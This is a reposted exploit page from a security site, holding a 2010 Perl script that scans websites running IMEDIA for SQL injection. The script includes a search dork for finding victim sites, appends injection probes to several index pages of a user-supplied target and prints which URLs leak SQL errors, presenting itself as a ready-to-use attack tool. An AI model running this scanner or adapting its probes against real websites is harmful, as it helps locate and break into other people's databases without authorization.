首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IMEDIA suffers from a remote SQL injection vulnerability
来源:vfocus.net 作者:Kannibal615 发布时间:2010-05-21   
# Exploit Titre: IMEDIA (index.php) SQL Injection Vulnerability
# Date: 19-05-2010
# Auteur: Kannibal615
# Link Software: N/A
# Version: N/A
# Test� sur: ALL
# CVE: N/A
# Code: 

# DORK : Powered by: Con-Imedia


#!usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;

system ("cls");
print "\n";
print "  @@    @@  @@@@@@     @@    @@    @@@@    @@@@@@@  @@  @@   @@@@@@@  @@@@@\n";
print "  @@    @@  @@   @@    @@    @@   @@  @@   @@       @@ @@    @@       @@   @@\n";
print "  @@    @@  @@ @@@     @@@@@@@@  @@    @@  @@       @@@@     @@@@@@   @@   @@\n";
print "   @@  @@   @@ @@@     @@@@@@@@  @@@@@@@@  @@       @@ @@    @@@@@@   @@ @@\n";
print "    @@@@    @@   @@    @@    @@  @@    @@  @@       @@  @@   @@       @@   @@\n";
print "     @@     @@@@@@     @@    @@  @@    @@  @@@@@@@  @@   @@  @@@@@@@  @@    @@\n\n";
print "                  LA ILAH ILLA ALLAH MOUHAMED RASOUL ALLAH\n\n";
print "\n\n";
print "[*]Coded By: Kannibal615 > Tunisian Genius Security > zn[at]live[dot]de\n\n";
print "[*]Greetz 1: My Best Friend AYMEN > THE P!RATOR\n";
print '[*]Greetz 2: Pc-InseCt/alghaking/emptyzero/V!Ru
___FCKpd___0

T4ckJ3n';
print "\n[*]Greetz 3: To All VBHACKER.NET Members\n";
print "[*]Dork    : Powered by: Con-Imedia\n";
print "[*]Usage   : k615>[target here]\n";
print "[*]Exemple : k615> www.target.com\n";
print "\n";
print "k615>";

$input=<>;
chomp $input;

if ( $input !~ /^http:/ ) {
$input = 'http://' . $input;
}
if ( $input !~ /\/$/ ) {
$input = $input . '/';
}


@path=('index1.php?linkid=999.9"','index1.php?sublinkid=999.9"','index1.php?linkid=&sublink=999.9"',
'index2.php?linkid=999.9"','index3.php?day=999.9"');

foreach $ways(@path){

$final=$input.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /sql/ ||
$response->content =~ /SQL error/ ||
$response->content =~ /SQL/ ||
$response->content =~ /syntax/ ||
$response->content =~ /Invalid query/ ||
$response->content =~ /your SQL/ ||
$response->content =~ /MySQL/ ||
$response->content =~ /at line 1/ ||
$response->content =~ /MySQL server/ ||
$response->content =~ /version for/ ||
$response->content =~ /Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/ ||
$response->content =~ /fetch/
){
print "[+] Vulnerable -> $final\n";
}
else{
print "[-] Not Vulner <- $final\n";
}
}
print "\n\nSOBHAN ALLAH\n";
print "press enter to exit";
$enter=<>;




#db-exploit 19-05-2010
#Coded By Kannibal615
#Tunisian Genius Security

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SyncBack Freeware V3.2.20.0
·linux/x86 execve("/usr/bin/wge
·Google Chrome 4.1.249.1059 Cro
·CommuniCrypt Mail 1.16 (ANSMTP
·QtWeb Browser version 3.3 Dos
·Solaris/x86 - execve("/bin/sh"
·支持serv-u7,8,9本地提权exp
·ComponentOne VSFlexGrid v. 7 &
·Solaris/x86 - Halt shellcode -
·NetBSD 5.0 and below Hack PATH
·NetBSD 5.0 and below Hack GENO
·TeamViewer 5.0.8232 Remote BOF
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved